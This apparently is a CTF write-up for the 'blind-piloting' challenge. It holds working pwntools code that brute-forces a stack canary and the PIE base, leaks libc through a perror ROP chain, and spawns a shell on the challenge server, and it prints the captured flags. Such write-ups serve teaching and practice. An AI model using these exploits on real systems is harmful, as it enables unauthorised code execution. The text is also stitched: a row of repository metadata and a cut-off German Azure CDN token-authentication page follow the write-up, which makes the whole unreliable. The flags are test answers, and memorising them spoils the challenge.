The first hit from Googling `"movaps XMMWORD PTR [rsp+0x50], xmm0"` (see little `→` above) returned: [https://blog.binpang.me/2019/07/12/stack-alignment/](https://blog.binpang.me/2019/07/12/stack-alignment/) (pause and read this).
There are two ways to solve this:
1. Write a return ROP gadget on the stack after the base pointer but before the `win` address. The problem with that is that we'd need to know the entire base process address (we need to figure this out anyway for the 2nd flag).
2. Jump _into_ `win` avoiding the `push rbp` that is misaligning the stack.
```
Dump of assembler code for function win:
0x000056401f9079ec <+0>: push rbp
0x000056401f9079ed <+1>: mov rbp,rsp
0x000056401f9079f0 <+4>: lea rdi,[rip+0x140] # 0x56401f907b37
0x000056401f9079f7 <+11>: call 0x56401f9077e0 <system@plt>
0x000056401f9079fc <+16>: nop
0x000056401f9079fd <+17>: pop rbp
0x000056401f9079fe <+18>: ret
```
Option 2 for this part of the challenge is the simpler solution, instead of using `0x79ec` we'll use `0x79f0`.
To test this we first need to attach GDB to the parent process with `attach 35650`. This is a parent PID. This can be obtained from the right pane with `p.pid`.
Next we just repeat the previous steps, `c` in the left pane, then `p.sendline()` in the right.
Now the exploit:
```
p.sendline(buf + canary + 8*b'B' + p16(0x79f0))
```

The left pane should have something like this:
```
process 36414 is executing new program: /usr/bin/dash
[Attaching after process 36414 fork to child process 36415]
[New inferior 5 (process 36415)]
[Detaching after fork from parent process 36414]
[Inferior 4 (process 36414) detached]
process 36415 is executing new program: /usr/bin/cat
[Inferior 5 (process 36415) exited normally]
```
Indicating that `/bin/sh` followed by `/usr/bin/cat` was executed.
Exploit achieved.
If you type `print(p.recvline())` in the right pane you should get the output of the `cat` command, IOW, `flag1.txt`:
```
>>> print(p.recvline())
b'> > > pctf{34zy_fl4g_h3r3_n0t_muc4_m0r3}\n'
```
There's one last bit to figure out; that leading `7`. The difference between the base process address and `win` is `0x9ec`. The `7` was random (ASLR) and will need to be brute-forced as well when exploiting the remote server (no GDB to help you there):
Replacing:
```
import code
code.interact(
local=locals(),
banner="\nfrom another terminal type: gef blindpiloting " + str(p.pid) + "\n",
exitmsg="\ngoing back to code\n"
)
```
with:
```
bp = 8 * b'B'
flag1 = 0x9f0
for i in range(16):
payload = buf + canary + bp + p16(flag1 + i * 0x1000)
print(hex(flag1 + i * 0x1000))
p.sendline(payload)
_ = p.recvuntil('}',timeout=0.25)
if _.find(b'pctf') != -1:
print(_[_.find(b'pctf'):])
break
p.clean()
if _.find(b'pctf') == -1:
print("FAILED, no base for you")
sys.exit(1)
```
should do the trick.
The `payload` should look similar to the handjob above, however we have to test each 4th nibble until the exploit works.
The `p.recvuntil('}',timeout=0.25)` will wait up to `0.25` seconds to detect the flag. When testing with the challenge server it may need to be tuned depending on how overloaded the server is and network congestion. `0.25` worked for me (3 days after the CTF). Longer is fine too, it's only 16 attempts.
> P.S. remember to create a `flag1.txt` file during dev/test.
Output:
```
[x] Starting local process './blindpiloting'
[+] Starting local process './blindpiloting': pid 36426
[*] '/lib/x86_64-linux-gnu/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
b'0008'
b'0008d5'
b'0008d531'
b'0008d531e5'
b'0008d531e54a'
b'0008d531e54af3'
b'0008d531e54af367'
HAVE CANARY
0x9f0
0x19f0
0x29f0
0x39f0
0x49f0
0x59f0
0x69f0
0x79f0
0x89f0
0x99f0
0xa9f0
0xb9f0
0xc9f0
0xd9f0
b'pctf{34zy_fl4g_h3r3_n0t_muc4_m0r3}'
```
Flag 1: `pctf{34zy_fl4g_h3r3_n0t_muc4_m0r3}`
### Exploit Part 2
There isn't a `win2`.
We're going to need to perform a 3rd brute-force to get the entire base process address. This is fairly straightforward using the same techniques above. Once we have this we have options, such as ROP.
#### Analysis
We need to find a way to emit something useful. Once we have the base processor address we can use ROP, however there's really nothing of much use within the binary itself (or at least I could find)--we're going to need to use `libc`.
Let's check the menu.
Type `gef blindpiloting`, then `r` to run, then `ctrl-c` to stop, then finally `got`:
```
gef➤ got
GOT protection: Full RelRO | GOT functions: 9
[0x555555754f90] write@GLIBC_2.2.5 → 0x7ffff7ecf300
[0x555555754f98] __stack_chk_fail@GLIBC_2.4 → 0x7ffff7ef0dd0
[0x555555754fa0] system@GLIBC_2.2.5 → 0x7ffff7e134e0
[0x555555754fa8] read@GLIBC_2.2.5 → 0x7ffff7ecf260
[0x555555754fb0] setvbuf@GLIBC_2.2.5 → 0x7ffff7e45d50
[0x555555754fb8] waitpid@GLIBC_2.2.5 → 0x7ffff7ea3a30
[0x555555754fc0] perror@GLIBC_2.2.5 → 0x7ffff7e234f0
[0x555555754fc8] exit@GLIBC_2.2.5 → 0x7ffff7e07d40
[0x555555754fd0] fork@GLIBC_2.2.5 → 0x7ffff7ea3d90
```
These are the `libc` functions from our GOT that we can call. On the left are the addresses in the process space, which we can brute-force and leverage. On the right are the `libc` addresses of the functions. The Linux dynamic linker/loader populates this table, and thanks to ASLR it will be different (both sides of the table) on each run (but not on each fork).
From the list, `write`, `system`, and `perror` can all emit characters. `write` is more complex, requiring 3 arguments (4 actually--the system call number). `system` would be perfect, however we have to pass a pointer to a character string holding the command we want to run, and unfortunately there is no `cat flag2.txt` or `/bin/sh` string in `blindpiloting` we can use. That leaves `perror`.
`perror` in this context is not unlike `puts`. `perror`, like `system`, needs a pointer to a string (a "string" being an array of bytes terminated with a NULL), and will emit that string along with some other text (which we have little use for, except to detect that we successfully called `perror`).
The GOT is a table of pointers; we just need to pick one to leak. `write` is out--its libc address contains a NULL byte (`0x7ffff7ecf300`), so `perror` would not emit the entire address. The rest are all fine candidates. Out of laziness I just used `perror`'s address (yyp, edit--you'll see in the code).
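As an aside, you don't need GDB to enumerate these candidates; pwntools can read the GOT/PLT offsets straight from the binary without running anything--we'll use exactly this for `perror` later:
```
from pwn import ELF

binary = ELF('blindpiloting')   # static parse of the ELF, nothing is executed
for name, offset in binary.got.items():
    print(f"GOT {name:18s} {hex(offset)}")   # these are offsets; add procbase at runtime
```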
When `perror` is invoked it expects RDI to be loaded with the address of a string, so we first have to _pop_ a value into RDI. You can determine this by looking at the Ghidra disassembly:

You can also discover this with a small C program and GDB, by setting a breakpoint before `perror` and looking at the registers, e.g.:
```
#include <stdio.h>
int main()
{
perror("foo");
return 0;
}
```
Compile and load with `gef perror_test`, disassemble, set breakpoint, then run:
```
# gcc -o perror_test perror_test.c
# gef perror_test
gef➤ disas main
Dump of assembler code for function main:
0x0000000000001149 <+0>: endbr64
0x000000000000114d <+4>: push rbp
0x000000000000114e <+5>: mov rbp,rsp
0x0000000000001151 <+8>: lea rdi,[rip+0xeac] # 0x2004
0x0000000000001158 <+15>: call 0x1050 <perror@plt>
0x000000000000115d <+20>: mov eax,0x0
0x0000000000001162 <+25>: pop rbp
0x0000000000001163 <+26>: ret
End of assembler dump.
gef➤ b *main+15
Breakpoint 1 at 0x1158
gef➤ r
Starting program: /pwd/datajerk/b01lersctf/blind-piloting/perror_test
```
After the break, look at the registers and notice a pointer to `foo` in `$rdi`:
```
$rax : 0x0000555555555149 → <main+0> endbr64
$rbx : 0x0
$rcx : 0x0000555555555170 → <__libc_csu_init+0> endbr64
$rdx : 0x00007fffffffe658 → 0x00007fffffffe874 → "LESSOPEN=| /usr/bin/lesspipe %s"
$rsp : 0x00007fffffffe560 → 0x0000555555555170 → <__libc_csu_init+0> endbr64
$rbp : 0x00007fffffffe560 → 0x0000555555555170 → <__libc_csu_init+0> endbr64
$rsi : 0x00007fffffffe648 → 0x00007fffffffe840 → "/pwd/datajerk/b01lersctf/blind-piloting/perror_tes[...]"
$rdi : 0x0000555555556004 → 0x3b031b01006f6f66 ("foo"?)
$rip : 0x0000555555555158 → <main+15> call 0x555555555050 <perror@plt>
$r8 : 0x0
$r9 : 0x00007ffff7fe11f0 → endbr64
$r10 : 0x0
$r11 : 0x0
$r12 : 0x0000555555555060 → <_start+0> endbr64
$r13 : 0x00007fffffffe640 → 0x0000000000000001
$r14 : 0x0
$r15 : 0x0
$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
```
Or you can just RTFM (Linux Kernel docs):
```
RAX -> system call number
RDI -> first argument
RSI -> second argument
RDX -> third argument
R10 -> fourth argument
R8 -> fifth argument
R9 -> sixth argument
```
Since `perror` has one argument, RDI it is. (Strictly speaking that table is the *syscall* convention; ordinary function calls follow the System V AMD64 ABI--RDI, RSI, RDX, RCX, R8, R9--but the first argument lands in RDI either way.)
After leaking a `libc` address, it's game over.
#### Attack Plan
1. Brute-force base process address using `flag1.txt`
2. Use `perror` to leak `libc` address
3. Use `libc` to get a shell
4. Get the flag
#### Brute-force base process address using `flag1.txt`
Append to the previous code:
```
p.clean()
procbase = p16(flag1 + i * 0x1000)
for i in range(6):
    # 'x' = candidate byte values (0-255, excluding 0x0a), defined earlier in the script for the canary brute-force
    for j in x:
payload = buf + canary + bp + procbase + p8(j)
p.sendline(payload)
r = p.recvuntil('> ')
r += p.clean(timeout=0.25)
if r.find(b'pctf') != -1:
procbase += p8(j)
print(binascii.hexlify(procbase))
break
if not r.find(b'pctf') != -1:
print("FAILED, you prob got an LF (0xa) in stack")
sys.exit(1)
procbase = int(procbase[::-1].hex(),16) ^ flag1
print(hex(procbase))
print("HAVE PROCBASE")
import code
code.interact(
local=locals(),
banner="\nfrom another terminal type: gef blindpiloting " + str(p.pid) + "\n",
exitmsg="\ngoing back to code\n"
)
```
You should be getting used to this pattern by now--looping through all byte values (except `0xa`) and testing for success (in this case, getting the contents of `flag1.txt` back). This time the payload is 8 A's + canary + 8 B's (for the saved base pointer) + procbase (the first 2 bytes from the previous step + the bytes brute-forced in this 3rd step).
Of the 8 bytes, we only have to brute-force 6 since we already know the first two from the previous step. Actually, it's not strictly necessary to brute-force the last two bytes either: x86_64 only uses 48-bit addresses (as of this writing), so the top two bytes are always `0x00`. But since this could change in the future, and since brute-forcing `0x00` is quick, I kept the outer loop to find all 6 remaining bytes.
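Rough back-of-the-envelope numbers for why the byte-at-a-time approach is practical at all:
```
# At most 255 guesses per unknown byte (0x0a is skipped), so about
# 6 * 255 = 1530 forks worst case, instead of 2**48 for the whole address.
print(6 * 255, 2 ** 48)
```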
w.r.t. the following two lines:
```
r = p.recvuntil('> ')
r += p.clean(timeout=0.25)
```
This is where I lost a bit of time. The previous code I had developed worked locally but not remotely. When testing over the network I'd either get `> pctf{34zy_fl4g_h3r3_n0t_muc4_m0r3}` or `pctf{34zy_fl4g_h3r3_n0t_muc4_m0r3} >` depending on whether or not the new fork sent the new prompt (`> `) before the old fork sent the flag. To fix this I added the 2nd line to wait 0.25 seconds for any other output. Like the previous step this is tunable and may vary depending on the network and challenge server load. Larger values will still work, just slower.
> Tip: use `context.log_level='DEBUG'` when developing your _pwntools_ exploits to find these problems sooner.
Run it:

The right pane is the output of all three brute-force attacks. We have the canary, the first flag, and the base process address (`0x563df74f1000`). In the left pane GDB (gef) is running with `set follow-fork-mode child` with `context` output.
#### Use `perror` to leak `libc` address
In the left pane type `got`:
```
gef➤ got
GOT protection: Full RelRO | GOT functions: 9
[0x563df76f1f90] write@GLIBC_2.2.5 → 0x7f72abaa7300
[0x563df76f1f98] __stack_chk_fail@GLIBC_2.4 → 0x7f72abac8dd0
[0x563df76f1fa0] system@GLIBC_2.2.5 → 0x7f72ab9eb4e0
[0x563df76f1fa8] read@GLIBC_2.2.5 → 0x7f72abaa7260
[0x563df76f1fb0] setvbuf@GLIBC_2.2.5 → 0x7f72aba1dd50
[0x563df76f1fb8] waitpid@GLIBC_2.2.5 → 0x7f72aba7ba30
[0x563df76f1fc0] perror@GLIBC_2.2.5 → 0x7f72ab9fb4f0
[0x563df76f1fc8] exit@GLIBC_2.2.5 → 0x7f72ab9dfd40
[0x563df76f1fd0] fork@GLIBC_2.2.5 → 0x7f72aba7bd90
```
`perror` is `procbase` + `0x200fc0`. This is our _pointer_ to a _libc_ address (e.g. `0x7f72ab9fb4f0`).
Actually, there is an easier way to find this with _pwntools_. In the right pane, type:
```
binary = ELF('blindpiloting')
perror_got = binary.got['perror']
hex(perror_got)
hex(procbase + perror_got)
```
Output:
```
>>> binary = ELF('blindpiloting')
[*] '/pwd/datajerk/b01lersctf/blind-piloting/blindpiloting'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
>>> perror_got = binary.got['perror']
>>> hex(perror_got)
'0x200fc0'
>>> hex(procbase + perror_got)
'0x563df76f1fc0'
```
That last value (`0x563df76f1fc0`) should match `perror` in the GOT above (`[0x563df76f1fc0] perror@GLIBC_2.2.5`).
To call `perror` to emit (leak) the `libc` address, we can use the PLT. In the right pane, type:
```
perror_plt = binary.plt['perror']
hex(perror_plt)
hex(procbase + perror_plt)
```
Output:
```
>>> perror_plt = binary.plt['perror']
>>> hex(perror_plt)
'0x820'
>>> hex(procbase + perror_plt)
'0x563df74f1820'
```
`0x563df74f1820` is the address we will write over the saved return address on the stack.
In the left pane type `disas 0x563df74f1820` to confirm:
```
gef➤ disas 0x563df74f1820
Dump of assembler code for function perror@plt:
0x0000563df74f1820 <+0>: jmp QWORD PTR [rip+0x20079a] # 0x563df76f1fc0 <[email protected]>
0x0000563df74f1826 <+6>: push 0x6
0x0000563df74f182b <+11>: jmp 0x563df74f17b0
End of assembler dump.
```
Setting the return address in the stack to `procbase` + `0x820` (`0x563df74f1820`) will call `perror` and emit whatever RDI points to.
> This would be a good time to read up on GOT, PLT, and ROP.
Lastly, we need a way to _pop_ a value from the stack into RDI, and to do that we need a ROP gadget. In the right pane, type:
```
context.clear(arch='amd64')
rop = ROP('blindpiloting')
pop_rdi = rop.find_gadget(['pop rdi','ret'])[0]
hex(pop_rdi)
```
Output:
```
>>> context.clear(arch='amd64')
>>> rop = ROP('blindpiloting')
[*] Loaded 14 cached gadgets for 'blindpiloting'
>>> pop_rdi = rop.find_gadget(['pop rdi','ret'])[0]
>>> hex(pop_rdi)
'0xb13'
```
That is the location in `blindpiloting` where there is a `pop rdi` instruction followed by a `ret` instruction. To illustrate this:
```
# objdump -M intel -d blindpiloting | grep -A1 b12:
b12: 41 5f pop r15
b14: c3 ret
```
At offset `0xb13` is `0x5f` followed by `0xc3`. Jumping one byte into the `pop r15` instruction skips its REX prefix (`0x41`), and what's left--`0x5f`--decodes as `pop rdi`, with `0xc3` being `ret`. An easy way to check:
```
# cat >rop.s <<'EOF'
> BITS 64
> pop rdi
> ret
> EOF
# nasm rop.s
# hexdump -C rop
00000000 5f c3 |_.|
00000002
```
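If you have pwntools handy you can also skip nasm and disassemble the two bytes directly (this relies on pwntools' usual binutils backend being installed):
```
from pwn import disasm
print(disasm(b'\x5f\xc3', arch='amd64'))
#   0:   5f    pop    rdi
#   1:   c3    ret
```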
Now that we have all the necessary information it is time to test our leak. In the left pane type `c` to continue, and in the right pane type:
```
p.sendline()
```
The left pane should look something like this:
```
gef➤ c
Continuing.
[Attaching after process 6079 fork to child process 7377]
[New inferior 2 (process 7377)]
[Detaching after fork from parent process 6079]
[Inferior 1 (process 6079) detached]
```
In the right pane, create and send payload:
```
payload = buf + canary + bp
payload += p64(procbase + pop_rdi)
payload += p64(procbase + perror_got)
payload += p64(procbase + perror_plt)
```
This payload will write out the buffer, then overflow the canary and the saved base pointer. The return address on the stack will be replaced with the address to our `pop rdi` gadget. This gadget will _pop_ off the next value on the stack (the address to `perror` in the GOT that is then a pointer to the libc `perror` function) into `rdi`. The second instruction in the gadget will `ret`. That return will then pop off the next value on the stack into `rip` and execute the `perror` function that will then leak a libc address.
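Pictured as a stack diagram (offsets as assumed above, low addresses first):
```
[ 8 bytes ] buf         -> 'AAAAAAAA', fills the local buffer
[ 8 bytes ] canary      -> must match the leaked canary or the child aborts
[ 8 bytes ] bp          -> saved RBP, value irrelevant ('BBBBBBBB')
[ 8 bytes ] saved RIP   -> procbase + pop_rdi    ; ret lands on our gadget
[ 8 bytes ]             -> procbase + perror_got ; popped into RDI
[ 8 bytes ]             -> procbase + perror_plt ; gadget's ret jumps here
```
Now send it: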
```
p.sendline(payload)
```
The left pane should have exited _normally_:
```
gef➤ c
Continuing.
[Attaching after process 6079 fork to child process 7377]
[New inferior 2 (process 7377)]
[Detaching after fork from parent process 6079]
[Inferior 1 (process 6079) detached]
[Inferior 2 (process 7377) exited normally]
gef➤
```
In the right pane type the following to get and print the output:
```
_ = p.recvline()
_
```
Output:
```
b'> \xf0\xb4\x9f\xabr\x7f: Success\n'
```
Got the address of `perror`! Now let's get the libc base:
```
perror=(int(_.strip()[:-9][-6:][::-1].hex(),16))
hex(perror)
libcbase = perror - libc.symbols['perror']
hex(libcbase)
```
Output:
```
>>> perror=(int(_.strip()[:-9][-6:][::-1].hex(),16))
>>> hex(perror)
'0x7f72ab9fb4f0'
>>> libcbase = perror - libc.symbols['perror']
>>> hex(libcbase)
'0x7f72ab996000'
```
The address of `perror` (`0x7f72ab9fb4f0`) should match `perror` from the GOT above (`[0x563df76f1fc0] perror@GLIBC_2.2.5 → 0x7f72ab9fb4f0`).
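The slicing one-liner above works, but it's cryptic. An equivalent, more readable way to pull out the 6 little-endian address bytes (assuming the reply is exactly `b'> '` + 6 address bytes + `b': Success\n'`) would be:
```
raw = _                                    # b'> \xf0\xb4\x9f\xabr\x7f: Success\n'
addr_bytes = raw[2:8]                      # skip the b'> ' prompt, take 6 bytes
perror = u64(addr_bytes.ljust(8, b'\x00')) # pad to 8 bytes, unpack little-endian
libcbase = perror - libc.symbols['perror']
hex(libcbase)
```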
#### Use `libc` to get a shell

All that is left is to use libc to get a shell. In the left pane we'll have to attach to the parent using `p.pid` (from the right pane), then `c` to continue.
Same as before, but this time we point to `/bin/sh` in libc and call system:
```
payload = buf + canary + bp
payload += p64(procbase + pop_rdi)
payload += p64(libcbase + next(libc.search(b"/bin/sh")))
payload += p64(libcbase + libc.symbols['system'])
```
This payload is just like before: use the `pop rdi; ret` gadget to pop off the address that points to `/bin/sh` in libc, then call libc's `system` to execute the shell:
```
p.sendline()
p.sendline(payload)
```

SIGSEGV again. Does `movaps XMMWORD PTR [rsp+0x50], xmm0` look familiar?
Stack misalignment.
If you still do not understand why, read this again: [https://blog.binpang.me/2019/07/12/stack-alignment/](https://blog.binpang.me/2019/07/12/stack-alignment/)
The fix is easy: just ROP a lone `ret` first (it pops 8 bytes off the stack, restoring 16-byte alignment), then the rest of the payload. This trick could not be used with `win` above because we did not know the entire base process address.
Use `p.pid` in the right pane to find the PID and attach in the left pane.
As before `c` to continue, and `p.sendline()`, now the payload:
```
payload = buf + canary + bp
payload += p64(procbase + pop_rdi + 1)
payload += p64(procbase + pop_rdi)
payload += p64(libcbase + next(libc.search(b"/bin/sh")))
payload += p64(libcbase + libc.symbols['system'])
```
This payload will just return, then `pop rdi; ret`.
> `procbase + pop_rdi + 1` is just the `ret` part of the gadget; we could also have used `procbase + rop.find_gadget(['ret'])[0]`, but since we already know our gadget ends in `ret` we can just reuse that.
With `rdi` pointing to the string `/bin/sh`, the last part of the payload just calls `system`. Last attempt:
```
p.sendline(payload)
```
The left pane should report a shell is running:
```
gef➤ c
Continuing.
[Attaching after process 6079 fork to child process 7383]
[New inferior 5 (process 7383)]
[Detaching after fork from parent process 6079]
[Inferior 4 (process 6079) detached]
[Attaching after process 7383 vfork to child process 7384]
[New inferior 6 (process 7384)]
[Detaching vfork parent process 7383 after child exec]
[Inferior 5 (process 7383) detached]
process 7384 is executing new program: /usr/bin/dash
[Attaching after process 7384 fork to child process 7385]
[New inferior 7 (process 7385)]
[Detaching after fork from parent process 7384]
[Inferior 6 (process 7384) detached]
process 7385 is executing new program: /usr/bin/dash
```
Got shell.
In the right pane type: `p.interactive()`
```
>>> p.interactive()
[*] Switching to interactive mode
```
#### Get the flag
Type `cat flag2.txt`:
```
pctf{Eh_2_brute_Brut3_BRUT3!}
```
ctrl-d when done.
### Remote output:
Change: `#!/usr/bin/env -S python3 -i` to `#!/usr/bin/env python3` if you like.
```
[+] Opening connection to pwn.ctf.b01lers.com on port 1007: Done
[*] '/pwd/datajerk/b01lersctf/blind-piloting/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
b'008d'
b'008df2'
b'008df267'
b'008df267d6'
b'008df267d651'
b'008df267d651bd'
b'008df267d651bd38'
HAVE CANARY
0x9f0
0x19f0
0x29f0
0x39f0
0x49f0
b'pctf{34zy_fl4g_h3r3_n0t_muc4_m0r3}'
b'f04948'
b'f0494894'
b'f049489414'
b'f04948941456'
b'f0494894145600'
b'f049489414560000'
0x561494484000
HAVE PROCBASE
[*] '/pwd/datajerk/b01lersctf/blind-piloting/blindpiloting'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Loaded 14 cached gadgets for 'blindpiloting'
0x7f406a3a6270
0x7f406a32b000
HAVE LIBCBASE
[*] Switching to interactive mode
> $ cat flag2.txt
pctf{Eh_2_brute_Brut3_BRUT3!}
```
| 31.587336 | 560 | 0.7045 | eng_Latn | 0.966985 |
e03e31bce0d1b714259872d14af046e60d7eba72 | 86 | md | Markdown | docfx/api/index.md | ehtick/OAT | b5136da112cc60de138bb82a90812ec3d898f490 | [
"MIT"
] | 64 | 2020-07-19T04:21:24.000Z | 2022-02-22T00:26:48.000Z | docfx/api/index.md | ehtick/OAT | b5136da112cc60de138bb82a90812ec3d898f490 | [
"MIT"
] | 43 | 2020-07-19T17:12:07.000Z | 2022-03-09T20:43:08.000Z | docfx/api/index.md | ehtick/OAT | b5136da112cc60de138bb82a90812ec3d898f490 | [
"MIT"
] | 13 | 2020-07-21T19:29:51.000Z | 2022-01-24T10:01:53.000Z | # Explore
You can explore the OAT documentation using the navigation bar to the left. | 28.666667 | 75 | 0.802326 | eng_Latn | 0.999263 |
e03e321e4d272c1a32c1e57c147401b0425749d1 | 18,277 | md | Markdown | articles/cdn/cdn-token-auth.md | LeMuecke/azure-docs.de-de | a7b8103dcc7d5ec5b56b9b4bb348aecd2434afbd | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/cdn/cdn-token-auth.md | LeMuecke/azure-docs.de-de | a7b8103dcc7d5ec5b56b9b4bb348aecd2434afbd | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/cdn/cdn-token-auth.md | LeMuecke/azure-docs.de-de | a7b8103dcc7d5ec5b56b9b4bb348aecd2434afbd | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Schützen von Azure CDN-Assets mit Tokenauthentifizierung | Microsoft-Dokumentation
description: Hier erfahren Sie, wie Sie die Tokenauthentifizierung zum Schützen des Zugriffs auf Ihre Azure CDN-Assets verwenden.
services: cdn
documentationcenter: .net
author: zhangmanling
manager: zhangmanling
editor: ''
ms.assetid: 837018e3-03e6-4f9c-a23e-4b63d5707a64
ms.service: azure-cdn
ms.devlang: multiple
ms.topic: how-to
ms.tgt_pltfrm: na
ms.workload: integration
ms.date: 11/17/2017
ms.author: mazha
ms.openlocfilehash: bded48b59d10e47a9bbf476583fed78b5b97431d
ms.sourcegitcommit: 877491bd46921c11dd478bd25fc718ceee2dcc08
ms.translationtype: HT
ms.contentlocale: de-DE
ms.lasthandoff: 07/02/2020
ms.locfileid: "84887431"
---
# <a name="securing-azure-cdn-assets-with-token-authentication"></a>Schützen von Azure CDN-Assets mit Tokenauthentifizierung
[!INCLUDE [cdn-premium-feature](../../includes/cdn-premium-feature.md)]
## <a name="overview"></a>Übersicht
Die Tokenauthentifizierung ist ein Mechanismus, mit dem Sie verhindern können, dass Assets im Azure Content Delivery Network (CDN) für nicht autorisierte Clients bereitgestellt werden. Die Tokenauthentifizierung wird normalerweise genutzt, um das *Hotlinking* von Inhalten zu verhindern. Dabei verwendet eine andere Website (z.B. ein Diskussionsforum) Ihre Assets ohne Erlaubnis. Hotlinking kann sich auf Ihre Kosten für die Inhaltsbereitstellung auswirken. Durch Aktivieren der Tokenauthentifizierung im CDN werden Anforderungen von CDN-Edgeserver authentifiziert, bevor das CDN den Inhalt übermittelt.
## <a name="how-it-works"></a>Funktionsweise
Bei der Tokenauthentifizierung wird überprüft, ob Anforderungen von einer vertrauenswürdigen Website generiert werden. Dazu müssen die Anforderungen einen Tokenwert mit codierten Informationen zur anfordernden Person enthalten. Inhalte werden der anfordernden Person nur bereitgestellt, wenn die codierten Informationen die erforderlichen Voraussetzungen erfüllen. Andernfalls werden die Anforderungen abgelehnt. Sie können die Anforderungen einrichten, indem Sie einen oder mehrere der folgenden Parameter verwenden:
- Land/Region: Lassen Sie Anforderungen zu, die aus den Ländern/Regionen stammen, die durch den [Länder-/Regionscode](/previous-versions/azure/mt761717(v=azure.100)) angegeben sind, oder verweigern Sie solche Anforderungen.
- URL: Lassen Sie nur Anforderungen zu, die der angegebenen Ressource oder dem Pfad entsprechen.
- Host: Lassen Sie Anforderungen zu, die die im Anforderungsheader angegebenen Hosts verwenden, oder verweigern Sie solche Anforderungen.
- Verweiser: Lassen Sie Anforderungen vom angegebenen Verweiser zu, oder verweigern Sie solche Anforderungen.
- IP-Adresse: Lassen Sie nur Anforderungen zu, die von einer bestimmten IP-Adresse oder aus einem bestimmten IP-Subnetz stammen.
- Protokoll: Lassen Sie Anforderungen basierend auf dem Protokoll zu, das zum Anfordern des Inhalts verwendet wird, oder verweigern Sie solche Anforderungen.
- Ablaufzeit: Weisen Sie einen Datums- und Zeitbereich zu, um sicherzustellen, dass ein Link nur für eine begrenzte Zeit gültig bleibt.
Weitere Informationen finden Sie in den ausführlichen Konfigurationsbeispielen für jeden Parameter unter [Einrichten der Tokenauthentifizierung](#setting-up-token-authentication).
>[!IMPORTANT]
> Wenn die Tokenberechtigung für einen beliebigen Pfad für dieses Konto aktiviert ist, ist der Standardcachemodus der einzige Modus, der für die Zwischenspeicherung von Abfragezeichenfolgen verwendet werden kann. Weitere Informationen finden Sie unter [Steuern des Azure CDN-Zwischenspeicherverhaltens mit Abfragezeichenfolgen](cdn-query-string-premium.md).
## <a name="reference-architecture"></a>Referenzarchitektur
Im folgenden Workflowdiagramm wird beschrieben, wie das CDN die Tokenauthentifizierung verwendet, um mit der Web-App zu arbeiten.

## <a name="token-validation-logic-on-cdn-endpoint"></a>Tokenüberprüfungslogik auf dem CDN-Endpunkt
Im folgenden Flussdiagramm wird veranschaulicht, wie Azure CDN eine Clientanforderung überprüft, wenn die Tokenauthentifizierung auf dem CDN-Endpunkt konfiguriert ist.

## <a name="setting-up-token-authentication"></a>Einrichten der Tokenauthentifizierung
1. Navigieren Sie im [Azure-Portal](https://portal.azure.com) zu Ihrem CDN-Profil, und klicken Sie dann auf **Verwalten**, um das zusätzliche Portal zu starten.

2. Zeigen Sie mit der Maus auf **HTTP Large**, und klicken Sie im Flyout dann auf **Token Auth**. Sie können dann den Verschlüsselungsschlüssel und Verschlüsselungsparameter wie folgt einrichten:
1. Erstellen Sie einen oder mehrere Verschlüsselungsschlüssel. Bei einem Verschlüsselungsschlüssel muss die Groß-/Kleinschreibung beachtet werden, und er kann eine beliebige Kombination aus alphanumerischen Zeichen enthalten. Alle anderen Arten von Zeichen, einschließlich Leerzeichen, sind nicht zulässig. Die maximale Länge beträgt 250 Zeichen. Um sicherzustellen, dass die Verschlüsselungsschlüssel auf Zufallsbasis generiert werden, sollten sie mit dem [OpenSSL-Tool](https://www.openssl.org/) erstellt werden.
Das OpenSSL-Tool hat die folgende Syntax:
```rand -hex <key length>```
Beispiel:
```OpenSSL> rand -hex 32```
Erstellen Sie sowohl einen Primär- als auch einen Sicherungsschlüssel, um Downtime zu vermeiden. Ein Sicherungsschlüssel ermöglicht während der Aktualisierung des Primärschlüssels unterbrechungsfreien Zugriff auf Ihre Inhalte.
2. Geben Sie einen eindeutigen Verschlüsselungsschlüssel in das Feld **Primärschlüssel** ein, und geben Sie optional einen Sicherungsschlüssel in das Feld **Sicherungsschlüssel** ein.
3. Wählen Sie in der Liste **Minimum Encryption Version** (Verschlüsselungsmindestversion) die Verschlüsselungsmindestversion aus, und klicken Sie dann auf **Aktualisieren**:
- **V2**: Gibt an, dass mit dem Schlüssel Token der Versionen 2.0 und 3.0 generiert werden können. Verwenden Sie diese Option nur bei der Umstellung von einem älteren Verschlüsselungsschlüssel der Version 2.0 auf einen Schlüssel der Version 3.0.
- **V3**: (Empfohlen) Gibt an, dass mit dem Schlüssel nur Token der Version 3.0 generiert werden können.

4. Verwenden Sie das Verschlüsselungstool, um Verschlüsselungsparameter einzurichten und ein Token zu generieren. Mit dem Verschlüsselungstool können Sie Anforderungen basierend auf Ablaufzeit, Land/Region, Verweiser, Protokoll und Client-IP (in beliebigen Kombinationen) zulassen oder ablehnen. Anzahl und Art der Parameter, die zur Bildung eines Tokens kombiniert werden können, sind zwar nicht beschränkt, die Gesamtlänge des Tokens darf jedoch maximal 512 Zeichen betragen.

Geben Sie Werte für einen oder mehrere der folgenden Verschlüsselungsparameter im Abschnitt für das **Verschlüsselungstool** ein:
> [!div class="mx-tdCol2BreakAll"]
> <table>
> <tr>
> <th>Parametername</th>
> <th>BESCHREIBUNG</th>
> </tr>
> <tr>
> <td><b>ec_expire</b></td>
> <td>Dient dem Zuweisen einer Ablaufzeit zu einem Token. Nach Verstreichen dieser Zeit wird das Token ungültig. Anforderungen, die nach der Ablaufzeit übermittelt werden, werden abgelehnt. Dieser Parameter verwendet einen UNIX-Zeitstempel, der auf der Anzahl der Sekunden seit Beginn der UNIX-Standardepoche `1/1/1970 00:00:00 GMT` basiert. (Sie können Onlinetools für die Konvertierung zwischen der Standardzeit und der UNIX-Zeit verwenden.)>
